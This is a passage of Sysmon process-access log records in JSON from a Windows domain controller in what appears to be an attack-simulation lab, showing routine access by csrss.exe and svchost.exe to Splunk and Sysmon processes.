Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0423-5F25-0000-0010698A0B00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0423-5F25-0000-0010698A0B00}","TargetProcessId":"4636","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 